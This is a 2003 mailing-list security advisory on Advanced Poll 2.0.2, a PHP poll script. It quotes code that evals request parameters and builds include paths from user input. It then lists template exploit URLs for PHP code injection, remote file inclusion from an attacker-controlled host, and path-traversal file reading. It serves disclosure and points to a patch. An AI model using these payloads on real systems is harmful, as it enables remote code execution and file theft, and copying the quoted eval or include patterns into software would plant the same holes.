[VulnWatch] Advanced Poll : PHP Code Injection, File Include, Phpinfo
From: Frog Man (leseulfrog_at_hotmail.com)
Date: 10/25/03
- Previous message: H D Moore: "[VulnWatch] MS03-046 Microsoft Exchange 2000 Heap Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: vulnwatch@vulnwatch.org, bugtraq@securityfocus.com Date: Sat, 25 Oct 2003 16:04:55 +0200
Informations :
°°°°°°°°°°°°°
Language : PHP
Product : Advanced Poll
Version : 2.0.2 Textfile
Website : http://www.proxy2.de
Problems :
- PHP Code Injection
- File Include
- Phpinfo
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
comments.php :
------------------------------------------------------------------------------------------------------
[...]
$register_poll_vars = array("id","template_set","action");
for ($i=0;$i<sizeof($register_poll_vars);$i++) {
if (isset($HTTP_POST_VARS[$register_poll_vars[$i]])) {
eval("\$$register_poll_vars[$i] =
\"".trim($HTTP_POST_VARS[$register_poll_vars[$i]])."\";");
} elseif (isset($HTTP_GET_VARS[$register_poll_vars[$i]])) {
eval("\$$register_poll_vars[$i] =
\"".trim($HTTP_GET_VARS[$register_poll_vars[$i]])."\";");
} else {
eval("\$$register_poll_vars[$i] = '';");
}
}
[...]
------------------------------------------------------------------------------------------------------
booth.php, png.php :
---------------------------------------------------------------
<?php
$include_path = dirname(__FILE__);
if ($include_path == "/") {
$include_path = ".";
}
if (!isset($PHP_SELF)) {
global $HTTP_GET_VARS, $HTTP_POST_VARS, $HTTP_SERVER_VARS;
$PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
if (isset($HTTP_GET_VARS)) {
while (list($name, $value)=each($HTTP_GET_VARS)) {
$$name=$value;
}
}
if (isset($HTTP_POST_VARS)) {
while (list($name, $value)=each($HTTP_POST_VARS)) {
$$name=$value;
}
}
if(isset($HTTP_COOKIE_VARS)){
while (list($name, $value)=each($HTTP_COOKIE_VARS)){
$$name=$value;
}
}
}
require $include_path."/include/config.inc.php";
require $include_path."/include/class_poll.php";
[...]
---------------------------------------------------------------
poll_ssi.php, popup.php :
----------------------
include "./booth.php";
----------------------
admin/common.inc.php :
---------------------------------------------------------------
[...]
if (!isset($PHP_SELF)) {
$PHP_SELF = $HTTP_SERVER_VARS["PHP_SELF"];
if (isset($HTTP_GET_VARS)) {
while (list($name, $value)=each($HTTP_GET_VARS)) {
$$name=$value;
}
}
if (isset($HTTP_POST_VARS)) {
while (list($name, $value)=each($HTTP_POST_VARS)) {
$$name=$value;
}
}
if(isset($HTTP_COOKIE_VARS)){
while (list($name, $value)=each($HTTP_COOKIE_VARS)){
$$name=$value;
}
}
}
$pollvars['SELF'] = basename($PHP_SELF);
unset($lang);
if (file_exists("$base_path/lang/$pollvars[lang]")) {
include ("$base_path/lang/$pollvars[lang]");
} else {
include ("$base_path/lang/english.php");
}
[...]
---------------------------------------------------------------
In the /admin/ directory, in the files :
- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php
:
------------------------------------
[...]
$include_path = dirname(__FILE__);
$base_path = dirname($include_path);
require "./common.inc.php";
[...]
------------------------------------
misc/info.php :
-------------------------
<html>
<head>
<title>PHP Info</title>
</head>
<body bgcolor="#3A6EA5">
<?php
phpinfo();
?>
-------------------------
Exploits :
°°°°°°°°
- if magic_quotes_gpc=OFF :
http://[target]/comments.php?id=";[PHPCODE]//&template_set=";[PHPCODE]//&action=";[PHPCODE]//
or with a POST form or cookies.
- This will only work if register_globals=OFF (this is not an error...) :
http://[target]/booth.php?include_path=http://[attacker] (or with png.php,
poll_ssi.php, popup.php) will include the files :
http://[attacker]/include/config.inc.php
and
http://[attacker]/include/class_poll.php
- This will work if register_globals=OFF OR ON :
http://[target]/admin/common.inc.php?basepath=http://[attacker] will include
the file http://[attacker]/lang/english.php.
The same hole can be found, in the /admin/ directory, in the files :
- index.php
- admin_tpl_new.php
- admin_tpl_misc_new.php
- admin_templates_misc.php
- admin_templates.php
- admin_stats.php
- admin_settings.php
- admin_preview.php
- admin_password.php
- admin_logout.php
- admin_license.php
- admin_help.php
- admin_embed.php
- admin_edit.php
- admin_comment.php
but only with register_globals=OFF.
And, with register_globals=OFF and with all the files above again, the url
http://[target]/admin/common.inc.php?base_path=..&pollvars[lang]=../../../file/to/view
will include the file http://[target]/admin/../../../file/to/view
- http://[target]/misc/info.php will show the phpinfo().
Solution/More details :
°°°°°°°°°°°°°°°°°°°°
Both patch and details can be found on http://www.phpsecure.info .
Credits :
°°°°°°°°
frog-m@n
http://www.phpsecure.info
_________________________________________________________________
Hotmail: votre e-mail gratuit ! http://www.fr.msn.be/hotmail
- Previous message: H D Moore: "[VulnWatch] MS03-046 Microsoft Exchange 2000 Heap Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
